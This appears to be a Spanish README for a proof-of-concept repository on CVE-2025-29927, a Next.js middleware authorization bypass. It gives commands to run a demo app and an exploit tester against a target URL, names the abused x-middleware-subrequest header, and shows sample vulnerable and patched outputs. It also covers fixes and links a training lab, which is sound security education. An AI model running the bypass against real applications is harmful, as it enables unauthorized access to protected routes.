
Este repositorio contiene una prueba de concepto (POC) y un script de explotación para CVE-2025-29927, una vulnerabilidad crítica en Next.js que permite a atacantes eludir las comprobaciones de autorización implementadas en middleware.
Este repositorio contiene una prueba de concepto (POC) para CVE-2025-29927, una vulnerabilidad crítica en Next.js que permite a atacantes eludir las comprobaciones de autorización implementadas en middleware.
Esta aplicación Next.js demuestra la vulnerabilidad con una ruta de panel protegido.
npm install
npm run build
npm run start
El script de explotación puede probar cualquier aplicación Next.js para esta vulnerabilidad.
npm run exploit <target-url>
npm run exploit http://localhost:3000/dashboard
La herramienta de explotación:
x-middleware-subrequest=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Normal request status: 307
Bypass request status: 200
⚠️ VULNERABLE
The route is protected but accessible with the bypass header
Hay una implementación de corrección disponible en la rama how-to-fix.
Actualizar la Versión de Next.js (Recomendado)
Implementar Validación Secundaria
=== Next.js CVE-2025-29927 Middleware Bypass Tester ===
Target: http://localhost:3000/dashboard
Testing vulnerability...
Making request without bypass header...
Making request with bypass header...
Normal request status: 307
Bypass request status: 307
✓ NOT VULNERABLE - Protected Route
The route is protected and the bypass attempt was unsuccessful
Normal request redirected to: /
Bypass request redirected to: /
Next.js utiliza una cabecera interna x-middleware-subrequest para evitar solicitudes recursivas. Esta vulnerabilidad permite a los atacantes eludir las comprobaciones de seguridad del middleware manipulando esta cabecera.
¿Quieres ir más allá? Este CVE está implementado como una bandera en OSS OopsSec Store, un laboratorio deliberadamente vulnerable diseñado para entrenamiento en seguridad ofensiva.
👉 Prueba el desafío aquí → kOaDT/oss-oopssec-store
Esta herramienta se proporciona solo con fines educativos y de prueba. Utiliza esta herramienta únicamente en sistemas que poseas o para los que tengas permiso explícito para realizar pruebas.